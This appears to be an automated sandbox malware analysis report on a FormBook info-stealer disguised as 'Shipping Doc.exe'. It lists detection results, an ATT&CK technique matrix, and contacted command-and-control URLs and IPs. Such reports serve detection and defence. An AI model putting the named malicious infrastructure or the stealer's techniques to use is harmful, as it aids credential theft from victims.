Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Shipping Doc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Rootkit1	Credential API Hooking1	Security Software Discovery121	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection512	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing2	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Timestomp1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Shipping Doc.exe	51%	Virustotal		Browse
Shipping Doc.exe	37%	Metadefender		Browse
Shipping Doc.exe	26%	ReversingLabs	ByteCode-MSIL.Spyware.Noon
Shipping Doc.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.Shipping Doc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.jiyu-kobo.co.jp/argeg	0%	Avira URL Cloud	safe
http://www.sajatypeworks.comiv	0%	URL Reputation	safe
http://www.founder.com.cn/cnP	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/vam&	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/fr-f	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/siv	0%	URL Reputation	safe
http://www.davinescosmetics.com/amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR	0%	Avira URL Cloud	safe
http://www.fonts.comny	0%	Avira URL Cloud	safe
http://www.tiro.comI	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.fontbureau.comcomFU	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/en-u	0%	Avira URL Cloud	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.fontbureau.comalsdn	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/8	0%	URL Reputation	safe
http://www.fontbureau.comlicd	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cny	0%	URL Reputation	safe
http://www.fonts.comicV	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/0	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.comc	0%	Avira URL Cloud	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0a	0%	Avira URL Cloud	safe
http://www.sajatypeworks.coma7	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnd	0%	URL Reputation	safe
http://www.bigdaddy.fish/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/U	0%	URL Reputation	safe
www.shopjempress.com/amb6/	0%	Avira URL Cloud	safe
http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/n	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/q	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnz	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/B	0%	URL Reputation	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/;	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0/	0%	URL Reputation	safe
http://www.founder.com.cn/cn8	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.founder.com.cn/cn4	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/d	0%	URL Reputation	safe
http://www.founder.com.cn/cn&	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/en-ut	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.bigdaddy.fish	208.113.204.236	true	true	unknown
davinescosmetics.com	34.102.136.180	true	false	unknown
www.davinescosmetics.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.davinescosmetics.com/amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR	false	Avira URL Cloud: safe	unknown
http://www.bigdaddy.fish/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR	true	Avira URL Cloud: safe	unknown
www.shopjempress.com/amb6/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.jiyu-kobo.co.jp/argeg	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.sajatypeworks.comiv	Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cnP	Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/vam&	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/fr-f	Shipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/siv	Shipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fonts.comny	Shipping Doc.exe, 00000002.00000003.213474844.000000000579B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.comI	Shipping Doc.exe, 00000002.00000003.214716683.000000000579B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comcomFU	Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Shipping Doc.exe, 00000002.00000003.222324750.0000000005792000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/en-u	Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fontfabrik.com	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comalsdn	Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/8	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comlicd	Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cny	Shipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.comicV	Shipping Doc.exe, 00000002.00000003.213525769.000000000579B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/0	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.ascendercorp.com/typedesigners.html	Shipping Doc.exe, 00000002.00000003.218505402.00000000057C6000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.comc	Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.de	Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0a	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.coma7	Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnd	Shipping Doc.exe, 00000002.00000003.215912066.000000000578E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/U	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC	cscript.exe, 0000000F.00000002.483172630.0000000005E2F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/n	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/q	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnz	Shipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/B	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comd	Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/;	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	Shipping Doc.exe, 00000002.00000003.216788502.0000000005786000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Shipping Doc.exe, 00000002.00000003.219469628.0000000005799000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/Y0/	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn8	Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn4	Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/d	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn&	Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/	Shipping Doc.exe, 00000002.00000003.219138017.00000000057BE000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/en-ut	Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.102.136.180	davinescosmetics.com	United States		15169	GOOGLEUS	false
208.113.204.236	www.bigdaddy.fish	United States		26347	DREAMHOST-ASUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458885
Start date:	03.08.2021
Start time:	20:39:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Shipping Doc.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 67.2% (good quality ratio 62.1%) Quality average: 69.6% Quality standard deviation: 31.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 49 Number of non-executed functions: 114
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 13.88.21.125, 23.211.4.86, 20.82.210.154, 173.222.108.226, 173.222.108.210, 51.103.5.186, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.49.157.6 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:40:34	API Interceptor	1x Sleep call for process: Shipping Doc.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DREAMHOST-ASUS	ORDER_0009_PDF.exe	Get hash	malicious	Browse	69.163.167.176
	A77HHPWkxJ.dll	Get hash	malicious	Browse	208.113.160.88
	YaRh8PG41y.exe	Get hash	malicious	Browse	69.163.228.182
	uw01Qp8GcO.exe	Get hash	malicious	Browse	69.163.228.182
	PAYMENT_COPY.exe	Get hash	malicious	Browse	69.163.224.143
	Order-CNS Amura Precision Co., Ltd 9A210118KR.exe	Get hash	malicious	Browse	69.163.224.174
	USD980950_Swift.exe	Get hash	malicious	Browse	173.236.228.194
	Order Signed PEARLTECH contract and PO.exe	Get hash	malicious	Browse	69.163.224.174
	HSBCpaymentSlipPDF.exe	Get hash	malicious	Browse	69.163.226.116
	NEW ORDER.xlsx	Get hash	malicious	Browse	75.119.198.195
	Order_1537-25.exe	Get hash	malicious	Browse	208.113.197.232
	Order 5122948.xlsb	Get hash	malicious	Browse	64.111.126.83
	Order 5122948.xlsb	Get hash	malicious	Browse	64.111.126.83
	INS 0966828.xlsb	Get hash	malicious	Browse	64.111.126.83
	Order 2522592.xlsb	Get hash	malicious	Browse	64.111.126.83
	INS 0966828.xlsb	Get hash	malicious	Browse	64.111.126.83
	Order 2522592.xlsb	Get hash	malicious	Browse	64.111.126.83
	INS 53614716.xlsb	Get hash	malicious	Browse	64.111.126.83
	WO 2825876.xlsb	Get hash	malicious	Browse	64.111.126.83
	INS 53614716.xlsb	Get hash	malicious	Browse	64.111.126.83

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipping Doc.exe.log Download File
Process:	C:\Users\user\Desktop\Shipping Doc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
